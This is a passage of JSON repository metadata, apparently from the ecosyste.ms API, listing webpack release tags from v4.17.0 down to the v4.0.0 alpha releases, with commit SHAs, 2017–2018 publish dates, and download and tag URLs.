itHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag